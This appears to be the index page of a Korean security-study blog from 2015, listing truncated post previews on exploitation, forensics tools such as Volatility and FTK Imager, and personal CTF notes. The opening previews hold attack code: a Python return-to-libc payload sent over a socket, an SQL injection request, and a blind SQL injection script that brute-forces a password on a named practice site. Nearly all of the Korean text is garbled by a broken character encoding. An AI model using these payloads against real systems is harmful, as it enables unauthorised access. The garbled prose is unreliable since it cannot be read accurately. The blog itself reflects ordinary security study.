728x90 ๋ฐ์ํ Lucete284 rtl chain from socket import * HOST = ""PORT = 4444 s = socket(AF_INET,SOCK_STREAM)s.connect((HOST,PORT)) #connect payload = "\x90"*260payload += "\xa0\x83\x04\x08"+"\x2e\x86\x04\x08"+"\x40\xa0\x04\x08"+"\x54\x81\x04\x08"payload += "\xa0\x83\x04\x08"+"\x2e\x86\x04\x08"+"\x41\xa0\x04\x08"+"\x57\x81\x04\x08"payload += "\xa0\x83\x04\x08"+"\x2e\x86\x04\x08"+"\x42\xa0\x04\x08"+"\x56\x81\x04\x08"payload += "\xa.. Security Study/Source 2015. 11. 21. sql injection reverse import urllibimport urllib2 url = ""req = urllib2.Request(url)sql = "union select 0x61646D696E 32%"data = "id=%00&pw=" + sql[::-1]#data = urllib.urlencode(data)req = urllib2.Request(url, data) req.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36')req.add_header('Cookie', 'PHPSESSID=') response = urllib2.urlopen(req)h.. Security Study/Source 2015. 11. 21. ์์ผํ๋ก๊ทธ๋๋ฐ from socket import * HOST = "" #hostPORT = 4444 #port s = socket(AF_INET,SOCK_STREAM)s.connect((HOST,PORT)) #connect payload = "\x90"*260 #payload print s.recv(1024) #1024 byte reads.send(payload + "\n")print s.recv(1024)print s.recv(1024) Security Study/Source 2015. 11. 21. Blind Sql Injection #http2,1)%3C%27N%27)--+&pw=adminimport urllibimport urllib2 ans =""ans2="" for i in range(1,11): for j in range(33,127) : url1 = "http://codeshell.kr/probs/unsolvable/index.php?Username=admin'+and(substring(Password," url1=url1+str(i)+",1)='" url1=url1+chr(j)+"')--+&pw=1" try: #print url1; req = urllib2.Request(url1) print 1111 req.add_header('cookie',"PHPSESSID=") res = urllib2.urlopen(req) dat.. Security Study/Source 2015. 11. 21. Base 64 encoding import base64 str64=""str64=base64.b64encode(str64.encode('ascii'))for i in range(1,11): str64=base64.encodestring(str64) str64=str64.decode("utf-8")print(str64.replace("\n","")) Security Study/Source 2015. 11. 21. ๊ตฌ๊ธ ํดํน ๊ตฌ๊ธ ํดํน์ด๋?์ด๋ฆ๋ง ๋ณด๋ฉด ๊ตฌ๊ธ์ ํดํนํ๋ ๋ฏํ ๋๋์ด ๋ ๋ค. ๊ทธ๋ฌ๋ ์ด๊ฒ์ด ๊ตฌ๊ธ ํดํน์ด์๋๋ผ ๊ตฌ๊ธ์ ์ฐ์ฐ์๋ค์ ์ด์ฉํ์ฌ ์๊ณ ์ ํ๋ ์ ๋ณด๋ฅผ ๋ฝ์ ๋ด๋ ๊ฒ์ ๋งํ๋ค.๊ตฌ๊ธ์๋ ๋ง์ ์ฐ์ฐ์๊ฐ ์๋ค. ์ด๋ฅผ ์ด์ฉํ์ฌ ๊ฐ์ธ ์ ๋ณด ๋ฟ๋ง ์๋๋ผ ๋ง์ ์ ์ ์ ๋ณด๋ฅผ ์์ ๋ผ์ ์๋ค. ๊ณผ์ฐ ๊ตฌ๊ธ ํดํน์ด ์ผ๋ง๋ ์ํํ ๊น? ์ด๋ฌํ ์์ผ๋ก ์ ์๋ฅผ ๊ฒ์ํ๋ฉด ์ด๋ฌํ ๋ธ๋ก๊ทธ๋ค์ด ๋์ค๋ ๊ฒ์ ์์ ์๋ค.๊ณผ์ฐ ์ด๋ฆ์ด๋ ์ ํ๋ฒํธ ๊ฐ์ ๊ฐ์ธ์ ๋ณด๋ฅผ ์๊ณ ์๋ ์ํฉ์์ ๊ฒ์์ ํ๋ฉด ๋ ๋์ฑ ๋ง์ ์๋ฃ์ ๋ ๋ง์ ์ ๋ณด๊ฐ ๋์ฌ ๊ฒ์ด๋ค. ๊ตฌ๊ธ ํดํน์ ์ผ๋ฐ์ ์ธ ๊ณต๊ฒฉ์ ๋ณด๋ฉด๋ฐ์ดํ(" ")๋ฐ์ดํ๋ฅผ ์ด์ฉํ๋ฉด ์ฌ๋ฌ๊ฐ ๋จ์ด๋ฅผ ๋ฌถ์ด์ ๊ฒ์ํ ์ ์๋ค. ์๋ฅผ๋ค์ด, Pwn&Play z3alous๋ผ๊ณ ๊ฒ์์ ํ๋ฉด ~ Pwn&Play ~ z3alous ๋ก ๊ฒ์์ด ๋์ง.. Security Study/Web 2015. 11. 21. lsof ๋ช ๋ น์ด ํ๋ก์ธ์ค ์ ๋ณด๋ฅผ ํ์ธํ๊ธฐ ์ํ ๋ช ๋ น์ด๋ lsof๋ผ๋ ๋ช ๋ น์ด๊ฐ ์๋ค. lsof๋ผ๋ ๋ช ๋ น์ด๋ LiSt Open Files์ ์ฝ์๋ก ์ด๋ฆ ๊ทธ๋๋ก ์ํํ๋ ํ๋ก๊ทธ ๋จ์ด๋ค. ์ข ๋ ๊ตฌ์ฒด์ ์ผ๋ก, ํ์ฌ System์์ ๋์๊ฐ๋ ๋ชจ๋ Process์ ์ํด์ Open๋ ํ์ผ๋ค์ ๋ํ ์ ๋ณด๋ฅผ ๋ณด์ฌ์ค๋ค.์ฌ์ฉ๋ฒ์1. ์ด๋ค ํน์ ํ ํ์ผ์ ์ฌ์ฉํ๊ณ ์๋ ํ๋ก์ธ์ค๋ค์ ๋ํ ์ ๋ณด๋ฅผ ์๊ณ ์ถ์ ๋,lsof 2. ์ด๋ค ํ์ผ ์์คํ ๋ด์, ๊ทธ๋ ๊ฒ ํฐ ํฌ๊ธฐ์ ํ์ผ๋ค์ ์ฐพ์ ์ ์๋๋ฐ๋ ๋ถ๊ตฌํ๊ณ , Available Space๊ฐ 0์ ํฅํด์ ์น๋ซ๊ณ ์์ ์๋ ์๋ค. lsof 3. ๊ธด๊ธํ ์ด๋ค ํ์ผ ์์คํ ์ unmountํด์ผ ํ ๋, lsof๋ ํ์ผ ์์คํ ๋ด์ ์๋ ํ์ผ๋ค์ ๋ํด์ ์ต์ธ์คํ๊ณ ์๋ ํ๋ก์ธ์ค๋ค์ ๋ค ์ฐพ์์ค ์ ์๋ค.lsof 4... For3nsic/Forensic 2015. 11. 20. volatility ์ฌ์ฉ๋ฒ 3 printkey ์ด ๋ช ๋ น์ด๋ ๋ ์ง์คํธ๋ฆฌ ํค๊ฐ์ ๋ณด์ฌ์ค๋ค. netscan์ด ๋ช ๋ น์ด๋ ํ์ฑํ๋ ๋คํธ์ํฌ ์ ๋ณด๋ฅผ ์๋ ค์ค๋ค.(windows 7์์๋ง ์ฌ์ฉ๊ฐ๋ฅ) connections๋ช ๋ น์ด๋ฅผ ์ด์ฉํ์ฌ ๋คํธ์ํฌ๋ฅผ ๊ฒ์ฌํ๋ค.์ฌ๊ธฐ์ ๋ ์์ธํ ์๊ธฐ์ํด ๋ฐ์ ๋ช ๋ น์ด๋ฅผ ์ฌ์ฉํ๋ค. connscan ์ด ๋ช ๋ น์ด๋ ์์ ๋ช ๋ น์ด์ ๊ฐ์ง๋ง ์ด๋ฏธ ๋์ด์ง ๋คํธ์ํฌ๋ ๋ํ๋ด ์ค๋ค. ] yarascan์ด๋ช ๋ น์ด๋ yara๋ฅผ ์ด์ฉํ์ฌ ์ ๋์ฝ๋ ๋ฑ์ ๊ฒ์ํ์ฌ ์ค๋ค. For3nsic/The Art of Memory Forensic 2015. 11. 19. volatility ์ฌ์ฉ๋ฒ 2 kpcrscan์ด๋ Finding Object Roots in Vista ์ ๋ฌ์ฌ๋ ๊ฒ์ฒ๋ผ ์์ฒด์ฐธ์กฐ ๋ฉค๋ฒ๋ค์ ์ฒดํฌํจ์ผ๋ก์จ ์ ์ฌ์ KPCR ๊ตฌ์กฐ๋ค์ ์ค์บํ๊ธฐ ์ํ์ฌ ์ฌ์ฉ๋๋ ๋ช ๋ น์ด์ด๋ค.IDT ์ GDT ์ฃผ์, current,idle, ๊ทธ๋ฆฌ๊ณ ๋ค์ ์ฐ๋ ๋๋ค, CPU ์ซ์, ๋ฒค๋&์๋, ๊ทธ๋ฆฌ๊ณ CR3 ๊ฐ๋ค์ ํฌํจํ๋ ๊ฐ๊ฐ์ ํ๋ก์ธ์์ ๋ํ ์์ธํ ์ธ๋ถ ์ ๋ณด๋ค์ ๋ํด ์์๋ณด๊ธฐ ์ํด ์ฌ์ฉํ๋ค. ๋ํ ์ด๋ช ๋ น์ด๋ฅผ ์ฌ์ฉํ๊ธฐ ์ํด profile์ด๋ ๋ช ๋ น์ด๋ฅผ ์ฌ์ฉํด์ผํ๋๋ฐ. profile ์ imageinfo๋ช ๋ น์ด๋ฅผ ์ด์ฉํ์ฌ ์์์๋ค. pslist์ด ๋ช ๋ น์ด๋ ์์คํ ์ ํ๋ก์ธ์ค๋ค์ ๋ณด์ฌ์ค๋ค. PsActiveProcessHead ๋ฅผ ๊ฐ๋ฆฌํค๋ ์ด์ค์ฐ๊ฒฐ๋ฆฌ์คํธ๋ฅผ ์ง๋๊ฐ๋ฉฐ ์คํ์ , ํ๋ก์ธ์ค ์ด๋ฆ, ํ๋ก์ธ์ค ID, ๋ถ๋ชจ ํ๋ก์ธ์ค ID.. For3nsic/The Art of Memory Forensic 2015. 11. 19. Volatility ์ฌ์ฉ๋ฒ Volatility์ ์ฌ์ฉ๋ฒ์ ์์จ ์ฌ์ฉ์ ํ๊ธฐ์ํด ๋ช ๋ น์ด๋ฅผ ์์์ผํ๋ค.๋จผ์ -h ์ต์ ์ ์ค์ผ๋ก ๋ช ๋ น์ด ๋ค์ ๋ณผ์ ์๋ค. ๋ํ ๊ฐ์ ์ ์ฅํ๊ธฐ ์ํด์๋ ๋ช ๋ น์ด๋ค์ > filename.txtWindowns Mac \ Windows ์ Mac์ด๋ ๋ช ๋ น์ด๊ฐ ๋น์ทํ ๊ฑฐ ๊ฐ๋ค. ์ดํ Mac์ผ๋ก๋ง ํ๊ฒ ์ด... ์ฌ๊ธฐ์ ๋ชจ๋ฅด๋ ๋ช ๋ น์ด๋ฅผ ์ฐพ์๋ณด๋ฉฐ ํด๋ณด๋ฉด ๋๊ฒ ๊ณ ๋จผ์ imageinfo ๋ช ๋ น์ด๋ฅผ ์ฌ์ฉํด๋ณด๊ฒ ๋ค. imageinfo๋ช ๋ น์ด๋ ๋ค๋ฅธ ํ๋ฌ๊ทธ์ธ์ ์ฌ์ฉํ ๋ --profile=PROFILE----์ ํ๋ผ๋ฏธํฐ๋ก ํด์ผํ๋ ์ ์๋ ํ๋กํ์ผ์ ์๋ ค์ฃผ๋ ๋ช ๋ น์ด์ด๋ค.๋ช ๋ น์ด๋ฅผ ์ฌ์ฉํ๊ธฐ์ํด ํ์ผ์ ๋ฃ์ด์ผํ๋๋ฐ... ๋ช ๋ น์ด ์ฌ์ฉ๋ฐฉ๋ฒ์ vol.py -f For3nsic/The Art of Memory Forensic 2015. 11. 18. Memory Forensic Volatility ์ค์น + ์คํ ์์ฆ MacBook์ ์ฌ์ฉํ์๋ ํ์๋ ๋ถ๋ค์ด ๋ง์์ ์ผ๋จ ์ค์น๋ ๋งฅ๋ถ์์ฃผ๋ก ํ๊ณ ๋ํ ์ฌ์ฉ๋ฒ์ ๋งฅ๊ณผ ์๋์ฐ๊ฐ ๋น์ท ํ๋ฏ๋ก ์ค๋ช ์ ์งํ ํ๊ฒ ์ต๋๋ค.๋งฅ ๊ฐ์ ๊ฒฝ์ฐ์๋ ์๋์ฐ์ ๋ค๋ฅด๊ฒ ํฐ๋ฏธ๋์ด๋ผ๋ ๊ธฐ๋ฅ์ ๊ฐ์ง๊ณ ์์ด์!!! ํฐ๋ฏธ๋ ๋ฆฌ๋ ์ค์์ ๋ง์ด ์ฌ์ฉํ๋๊ฑด๋ฐ ... ์ด๋ฅผ ๋ณด๋ฉด ๋งฅ์ด ์ ๋์ค๋ ๋ฆฌ๋ ์ค ๊ธฐ๋ฐ์ด๋ผ๋ ๊ฒ์ ์์ ์์ ๊ป๋๋ค.๋จผ์ volatility๋ฅผ ์ค์นํ๊ธฐ์ ํดํฐ๋ฏธ๋์ ์ด๊ณ brew install volatility๋ฅผ ์ณ์ฃผ์ธ์๊ทธ๋ผ ์ด๋ฌํ๊ฒ ๋ค์ด ๋ฐ๋ ๊ฒ์ ๋ณผ ์ ์์ผ์ค ๊ป๋๋ค.์ด๋ ๊ฒ ๋ค์ด ๋ก๋๋ฅผ ๋ค๋ฐ์ผ์๋ฉด ์๋์ฐ ์ฌ์ฉ์ ๋ถ๋ค์ CMD์ฐฝ์์ ์คํ์ ํ ๊ป๋๋ค. ์ด๋ป๊ฒ ์คํํ๋ WINDOWS ์ด๋ ๊ฒ CMD์ฐฝ์์ ์คํ์ํต๋๋ค. ์์ ๊ฒฝ๋ก๋ฅผ ์ฐพ์๊ฐ๋ ค๋ ํ๋ค์ฃ ? ์ค์น๋ฅผ ํ๊ณ ๋์๋ฉด ํด๋์๋๋ฐ ๊ทธํด๋์์ ์ฌํํธ(.. For3nsic/The Art of Memory Forensic 2015. 11. 18. FTK Imager ์์๋ณด๊ธฐ 2 FTK Imager์์ ๋ฉ๋ชจ๋ฆฌ ์บก์ณ ํ๊ธฐ FTK Imager๊ธฐ๋ฅ ์ค์์ ๋ฉ๋ชจ๋ฆฌ ์บก์ณ๊ธฐ๋ฅ์ด์๋ค.๋จผ์ ๋ฉ๋ชจ๋ฆฌ ์นฉ๊ฐ์ด ์๊ธด ๊ฒ์ ํด๋ฆญํ๋ค. ํด๋ฆญ์ ํ๋ฉด ์ด์ฐฝ์ด ๋์ค๋๋ฐ ๋ฉ๋ชจ๋ฆฌ ์บก์ณ๊ฐ ๋๋ฉด ์์ง๋ ํ์ผ์ ์ ์ฅํ ๋ชฉ์ ์ง ๊ฒฝ๋ก๋ฅผ ์ค์ ํ๋ ๊ณณ์ด๋ค. ๊ฒฝ๋ก๋ฅผ ์ค์ ํ๊ณ Capture Memory๋ฅผ ์ด์ฉํ์ฌ ์บก์ณ๋ฅผ ์์ํ๋ค. ์ด๋ ๋ํ ์ต์ ์ผ๋ก Pagefile.sys ํ์ผ์ ํฌํจํ๊ณ AD1์ฆ๊ฑฐ ํ์ผ ํ์์ผ๋ก ๋ง๋ค ์ ์๋ค. ์๋์ฐ ์์์๋ ์คํ์ค์ธ ๋ ์ง์คํธ๋ฆฌ ํ์ผ์ ๋ณต์ฌํ๊ฑฐ๋ ์ ์ฅํ ์ ์๋ค. ์ด๊ฒฝ์ฐ FTK๋ฅผ ์ด์ฉํ์ฌ ๋ณดํธ๋ ๋ ์ง์คํฐ๋ฅผ ์ป๊ณ , ๋ณต์ฌํ ๋ ์ฝ๋๋ฅผ ์ป์ ์ ์๋ค. ๋ฉ๋ด๋ฐ์์ ํ์๋ ๊ฒ์ ํด๋ฆญํ๋ฉด ์ด๋ฌํ ์ฐฝ์ด ๋จ๋๋ฐ ์ด์ฐฝ์์๋ ์ป์ด๋ธ ํ์ผ์ ์ ์ฅํ ํด๋๋ฅผ ์ ํด ์ฃผ๋ ๊ฒ์ด๋ค.์ ํํญ๋ชฉ์ ์ํธ๋ฅผ ๋ณต๊ตฌํ ๊ฒ์ธ์ง ์ ์ฒด ๋ .. For3nsic/Forensic 2015. 11. 17. FTK Imager์์๋ณด๊ธฐ 1 FTK๋ฅผ ์ด์ฉํ์ฌ ์ฆ๊ฑฐ๋ฌผ ์ถ๊ฐ์ ๋ฏธ๋ฆฌ๋ณด๊ธฐ ๊ธฐ๋ฅ์ ์์๋ณด์๋ฉ๋ด๋ฐ์์ File -> Add Evidence Item์ ํด๋ฆญํ๋ฉด ์ด๋ฌํ ์ฐฝ์ด ๋์จ๋ค.๊ทธํ ๋ค์์ ํด๋ฆญํ๋ฉด ์ด๋ฌํ ์ฐฝ์ด๋์ค๋ ์ด์ฐฝ์ ํ๋ ๋์คํฌ๋ฅผ ์ง์ ํ๋ ์ฐฝ์ด๋ค. USB๊ฐ์ ๊ฒ์ด ์ฐ๊ฒฐ ๋์ด์์ ๊ฒฝ์ฐ ์ง์ ๊ฐ๋ฅํ๋ค. FINISH๋ฅผ ๋๋ฅด๋ฉด ๋์ค๋ ์ฐฝ์ด๋ค. ๊ทธ๋ฆฌ๊ณ ์์ ๋ณด๋ฉด Evidence Tree ์ฐฝ์ ์ฆ๊ฑฐ๋ฌผ์ด ์ถ๋ ฅ๋๋ค. ๋ค์์ ํฌ๋ ์์ ํ๊ธฐ์ํ ์ด๋ฏธ์ง ์์ฑ์ ์์๋ณด์! ์ด๋ ๋ฉ๋ด๋ฐ์ ๋ณด๋ฉด ๋์คํฌ ๋ชจ์์ด ์๋ ๊ฒ์ ํ์ธํ ์ ์๋ค. ๋์คํฌ ๋ชจ์์ ํด๋ฆญํ์ฌ ์ด๋ฏธ์ง๋ฅผ ๋ง๋ค์์๋ค. ํด๋ฆญ์ ํ๋ฉด ์ด๋ฌํ ์ฐฝ์ด ๋จ๋ ๊ฒ์ ํ์ธ ํ ์์๋๋ฐ Raw, SMART, E01, AFF๊ฐ ์ด๋ฏธ์ง ํ์ ์ผ๋ก FTK์์ ์ง์ํ๋ค. ํ์ ์ ์ ํํ๊ณ ๋ค์์ ๋๋ฅด๊ฒ ๋๋ฉด ์ด๋ฌํ ์ฐฝ์ .. For3nsic/Forensic 2015. 11. 17. ๋ฐ์ดํฐ ์ ์ฅ ๋งค์ฒด ํฌ๋ ์์์ ์ค์ํ ์ฆ๊ฑฐ๋ฅผ ์์งํ ๋ ค๋ฉด ์ฆ๊ฑฐ๊ฐ ์ด๋์ ์ ์ฅ๋์ด ์๊ณ ์ ์ฅ๋ ์ ์๋ ๊ณณ์ ์๊ฐํด์ผ ํ๋ค. ๋ฐ์ดํฐ ์ ์ฅ ๋งค์ฒด๋ฅผ ๋ณด๋ฉด ํ๋๋์คํฌ๋ฅผ ์ ์ธํ ๋ง์ ๊ณณ์ ๋ฐ์ดํฐ๋ฅผ ์ ์ฅํ ์ ์๋ค.- ์๊ธฐ ๋ฏธ๋์ด - ํ๋กํผ ๋์คํฌ - ํ๋ ๋๋ผ์ด๋ธ - USB/PC์นด๋ - ZIP์ด๋ ํ ์ดํ ๋๋ผ์ด๋ธ- ๊ดํ ๋ฏธ๋์ด - CD - DVD- ๋์ฒด ๋ฏธ๋์ด - MP3 ํ๋ ์ด์ด - ํ๋ธ๋ฆฟ - ์ค๋งํธ ํฐ - ๋น๋์ค ๊ฒ์, TV ๋ฑ For3nsic/Forensic 2015. 11. 17. Chrome Forensic ์ด๋ฒ์ ํฌ๋ ์ ์ค์ ์น์ ์ด์ฉํ ํฌ๋ ์์ ๋ณผ๊ป๋ฐ...ํด์ด๋ฆ์ Chromeforensic์ด๋ผ๋ ํด์ ๋๋ค.์คํ์ ์ํค๋ฉด ์ด๋ฌํ GUIํ๊ฒฝ์ด ๋์ค๋ ๊ฑธ ๋ณผ์์์ต๋๋ค. ์น์บ์ ๋ฑ์ ๋ฐ์์ฌ ํด๋๋ฅผ ์ง์ ํด์ผํ๋๋ฐ ๊ธฐ๋ณธ์ ์ผ๋ก ํฌ๋กฌ ๊ฐ์๊ฒฝ์ฐ์๋ ์๋์ ์ ๋๊ฒฝ๋ก๋ฅผ ์ด์ฉํฉ๋๋ค. C:\Users\์ฌ์ฉ์\AppData\Local\Google\Chrome\User Data\Default์ฌ๊ธฐ์ ํ์ธ์ ํ๋ฉด ์ด๋ ๊ฒ ์ด๋ฏธ์ง๋ ๋์ด์ฃผ๋ ๊ฒ์ ๋ณผ์์๋ค. ์ด๋ฟ๋ง์๋๋ผ ํค์๋ ๋ฑ์ ๊ฒ์ํ์ฌ ๋ณด๊ธฐ ํธํ๊ฒ ์ฝ๊ฒ ๋์จ๋ค.ํฌ๋ ์ ์ค์์ ์น ๋ํ ๋งค์ฐ ์ค์ํ๋ค.์ด๋ฌํ ํด์ ์๊ณ ์์ผ๋ฉด ์ข์ ๋ฏํ๋ค. For3nsic/Forensic 2015. 11. 16. UBUNTU์์ QT๋ค์ด๋ฐ๊ธฐ ์ฐ๋ถํฌ์์ QT๋ฅผ ๋ค์ด๋ฐ์๋ณด์๋จผ์ http://www.qt.io/download-open-source/ qt ์คํ์์ค์ ์ ์ํด์ ๋ค์ด๋ฐ์ผ๋ฉด runํ์ผ์ด ์์ฑ๋์ด ์์ ๊ฒ์ด๋ค. ์ด๋ฅผ ๊ทธ๋ฅ ์คํ์ํค๋ ์ด๋ฌํ๊ฒ ๋ง์ ํ์ผ๋ค์ด ์ค์น๋๋ค...์ด๋ ๊ฒ ์ค์น๋ ํ์ผ์ ์ค์นํ๋ ์ค์น๊ฐ ๋์ง ์๋๋ค... ์์ด๋ด๊น?๋ฆฌ๋ ์ค์๋ ํฐ๋ฏธ๋์ด ์๋ค. ์ด๋ฅผ ์ด์ฉํด chmod 755 qt-unified-ninux-x64-online.run์ ํ ํ ./qt-unified-ninux-x64-online.run ์ด๋ ๊ฒ ์คํ์ํค๋ฉด ์ ์์ ์ผ๋ก ์คํ์ด๋๋ค.!!! ์ ํ!! ์ด๋ ๊ฒ ์ค์น๋๋ ๊ฒ์ ๋ณผ์์๋ค. !! Security Study/Server(Linux) 2015. 11. 16. HDCON ํ๊ธฐ! 2015๋ 11์ 14์ผ ์์นจ 10์ ~ 11์ 15์ผ ์์นจ 10์๊น์ง ์งํ๋ HDCON!!!๋ฌธ์ ๋ฅผ ํ๋ ค๊ณ ์์ถ์ ํธ๋ ์์งํ ํ๊ฐ ๋ฌ๋ค.!์ด์ ๋ ์ฉ๋! ๋๋ฌด ์ปท์ด์ !๊ทธ๋๋ ๋ฌธ์ ๋ฅผ ํ๋ ค๊ณ ๋ฌธ์ ๋ฅผ ๋ณด๋ฉฐ ์ด๊ฒ ์ ๊ฒ ์ค๋น๋ ํด๋ณธ ํ START!~~!๋ฌธ์ ๋ฅผ TRACK 1๋ถํฐ ๋ณด๋๋ฐ ๋ฆฌ๋ ์ค!๋ฆฌ๋ ์ค๋ฅผ ๋ณด๋ฉฐ 80ํผ ์ ๋ ์ ๊ทผ ํ ์ ์ด ๋ค์ด๋ฒ๋ ธ์ด์ ใ ใ ์๊ณ ์ผ์ด๋๋ ์๊ฐ์ด !!! 9์๊ฐ ํ์ฉ ๋์ด ๋ฒ๋ ธ๋๋ผ๊ตฌ์...๊ทธ๋์ TRACK 3๋ฒ์ ๋คํธ์ํฌ ํฌ๋ ์ ๋ฌธ์ ๋ฅผ ๋ณด๊ณ ์ธ๋ ํ๋ฑ ํ์ด ๋ฒ๋ ธ์ต๋๋ค! ใ ใ ๋ฌธ์ ๊ฐ ์ด๋ ค์ด ๋งํผ ์ฌ๋ฏธ๋ ์์ ํ๊ณ ๋จผ๊ฐ ๋ฐฐ์ฐ๋ ๋ฏํ ๋๋์ด ๋ค๋๊ตฐ์๊ฐ์ฅ ์์ฌ์ด๊ฑด 0-day๋ 0day๊ฐ ์๋๋ค?์ธ๊ฐ ์ ๋ฌธ์ !!!ํ๊ฐ๋๋ค ํ๊ฐ๋๋ค.!!!!๋ชปํผ๋งํผ ๋ค์ ํ์ด๋ณด๊ณ ์ถ์ ๋ฌธ์ ์๋ค. ๋ํ ๋ค๋ฅธ TRACK 2 .. My Story 2015. 11. 16. Reading package lists Error Reading package lists... Done Building dependency tree Reading state information... Done Calculating upgrade... Note, selecting 'Package' for regex 'Package' Done < == error vi /etc/apt/sources.list # Regular repositories deb http://http.kali.org/kali sana main non-free contrib deb http://security.kali.org/kali-security sana/updates main contrib non-free # Source repositories deb-src http://http.. Metasploit/Kali & Backtrack 2015. 11. 16. ๋ฉ๋ชจ๋ฆฌ ๋ถ์ ์ ์์์ผ ํ ์ฌํญ๋ค ๋ฉ๋ชจ๋ฆฌ ๋คํ ํ์ผ์ด๋?๋ฉ๋ชจ๋ฆฌ ๋ด์์ด ๊ฐ์ฅ ์์ํ ๋ฉ๋ชจ๋ฆฌ ๋คํํ์ผ์ ์์คํ ์ผ๋ก ๋ถํฐ ์ป๋ ๊ฒ์ ๋งํ๋ค. ์ด๋ฅผ ์ป๊ธฐ ์ํ ๋ฐฉ๋ฒ์ด ์๋ค1 - ํ๋์จ์ด๋ฅผ ์ด์ฉํ๋์จ์ด๋ฅผ ์ด์ฉํ๋ฉด ๋ฉ๋ชจ๋ฆฌ์์ญ์ ์ฌ์ฉํ์ง ์์ ์ข ๋ ์ ํํ ๋ฉ๋ชจ๋ฆฌ ๋คํ๋ฅผ ํ ์ ์๋ค. ๋ฟ๋ง ์๋๋ผ OS์ ์๊ด์์ด ์ฌ์ฉ ๊ฐ๋ฅํ๋ค.- PCI์ฅ์น- FireWire2 - ์ํํธ์จ์ด ๋๊ตฌ๋ฅผ ์ด์ฉํ๋ค.์ฆ์์์ ๋ฉ๋ชจ๋ฆฌ ๋คํ ํ์ผ์ ๋ง๋ค ์ ์๋ค.- DD - UNIX ๋๊ตฌ- KntDD- MDD - open source- WIN32(64)DD - ์๋์ฐ- Fastdd3 - OS ํฌ๋์ ๋คํ๋ฌธ์ ๋ฅผ ์ฐพ๊ธฐ์ํด ์์ฑ๋๋ ๋คํํ์ผ์ข ๋ฅ- ์์ ๋ฉ๋ชจ๋ฆฌ ๋คํ- ์ปค๋ ๋ฉ๋ชจ๋ฆฌ ๋คํ- ์ ์ฒด ๋ฉ๋ชจ๋ฆฌ ๋คํ4 - ํ์ด๋ฒ๋ค์ด์ ํ์ผ์ด์ฉ ๊ฐ์ ๋ฉ๋ชจ๋ฆฌ๋ฌผ๋ฆฌ์ ์ธ ์ค์ฒด๋ฅผ ๊ฐ์ง๊ณ ์์ง ์์ ๋ฉ๋ชจ๋ฆฌ๋ฅผ ๋งํ.. For3nsic/The Art of Memory Forensic 2015. 11. 14. ํฌ๋ ์ ๊ธฐ์ด ํฌ๋ ์ ์ฆ๊ฑฐ์ฒ๋ฆฌ ์ ์ฐจ์ ์ ์์์ ๋งํ ๋ฐ๊ฐ ์๋ค. ๋ง์ฝ ํฌ๋ ์์ ํ๋ค๊ณ ๋งํ๊ณ ๋ค๋๋๋ฐ ์ฆ๊ฑฐ์ฒ๋ฆฌ ์ ์ฐจ ๋ชจ๋ฅด๊ฑฐ๋ ํ๋ค๋ฉด... ๋ถ๋๋ฝ๋ค๊ทธ๋์ ํ๋ฒ ๋ ๊ฐ์กฐํ๋ค. ์๋? ์ค์ํ๋๊น.์ฌ์ ์ค๋น ๋จ๊ณ -> ์ฆ๊ฑฐ ์์ง ๋จ๊ณ -> ์ฆ๊ฑฐ ์ด์ก ๋จ๊ณ -> ์ฆ๊ฑฐ ๋ถ์ ๋จ๊ณ -> ์ ๋ฐ ๊ฒํ ๋จ๊ณ -> ๊ฒฐ๊ณผ ๋ฌธ์ํ ๋จ๊ณ ์ด๋ฌํ ์์ผ๋ก ๋๋ค!!! ์ฌ์ ์ค๋น ๋จ๊ณ์ฆ๊ฑฐ ์์ง ๋จ๊ณ์ฆ๊ฑฐ ์ด์ก ๋จ๊ณ*์ฆ๊ฑฐ ๋ถ์ ๋จ๊ณ์ฆ๊ฑฐ๋ฌผ ๋ณต์ ํ ๋์๋ ์๋ณธ ์ฆ๊ฑฐ๋ฌผ์ ๋ฌด๊ฒฐ์ฑ ์ ์ง๋ฅผ ์ํด ์ฐ๊ธฐ๋ฐฉ์ง์ฅ์น๋ฅผ ํด์ผ ํ๋ค.๋ํ ์ฆ๊ฑฐ๋ฌผ ๋ณต์ ๋ ๋ณด๊ด์ฉ๊ณผ ๋ถ์์ฉ์ผ๋ก ๋๋๋๋ฐ ์ด ๋์ ๋ฌผ๋ฆฌ์ ์์น๋ฅผ ๋ฐ๋ก ์ง์ ํ์ฌ ๊ด๋ฆฌํด์ผํ๋ค. *๋ฌด๊ฒฐ์ฑ* ๋งค์ฐ์ค์ํ๊ฑฐ๋ค. ์ฆ๊ฑฐ์ ๋ฒํธ๋ฅผ ๋ถ์ฌํ๊ณ ์๋ณธ ์ฆ๊ฑฐ๋ฌผ ๋ณต์ ๊ณผ์ ์ ๊ธฐ๋กํด์ผ ํ๋ค.์ฆ๊ฑฐ๋ฌผ๋ณต์ ๋ ์๋ณธ์ ์ฅ์น์ ๋์ผํ ๊ฒ์์ ์ด๋ฃจ์ด์ง๋ ๊ฒ์ด .. For3nsic/Forensic 2015. 11. 11. ์น์ฌ์ดํธ ๋ง๋ ํ๊ธฐ... ์น ์ฌ์ดํธ๋ฅผ ๋ง๋ ๊ฑด ์ฒ์์ด๋ค... ํ๊ธฐ๋ผ ํ๋ ์ ... ๋จผ๊ฐ ์ฌ๋ฐ์๋ค. ๋ค๋ค ์๋ฏ์ด ๋นก์น๋ ์ผ์ ๋ง๋ค. ๊ทธ๋ฌ๋ ํ๋ํ๋ ๋ง๋ค์ด๊ฐ๋ฉด์ ๋ณด๋ ๊ทธ ์พ๊ฐ ์ปดํจํฐ๋ฅผ ํ๋ ์ฌ๋์ด๋ฉด ๋ค๋ค ์๋ ์พ๊ฐ์ผ๊ฒ์ด๋ค. 3์ฃผ๋์ ์ด์ฌํ ๋ง๋ค๊ณ ๋ป์ง๋ํด๋ณด๊ณ ์ค๋ง ์ง์ ๋คํด๋ณด๋ฉด์ ๋ง์ ๊ฒ์ ๋ฐฐ์ฐ๊ณ ๋๋๊ฑฐ ๊ฐ๋ค. ๋ด ์์์ ๋์์ค ์น๊ตฌ ํ๋ช ์งฑ ์ด๋ค. ํ์ดํ ํ์! My Story 2015. 11. 11. ์๋ฒ ์ ์ ๋ฉ์ธ์ง, PHPMYADMIN ์ฃผ์ ๋ณ๊ฒฝ ubuntu ์๋ฒ์ ์ ์์ ํ์ ๋ ๋๋ฅผ ๋ฐ๊ฒจ์ฃผ๋ ์ฌ๋์ด ์๋ค๋ฉด ์ผ๋ง๋ ์ข์๊น?๊ทธ๊ฒ์ ์ํด ์ง๊ธ ์ฌ๊ธฐ์ ๊ธ์์จ๋ณด๊ฒ๋ค!!! ์๋ฒ์ ์ ์์ 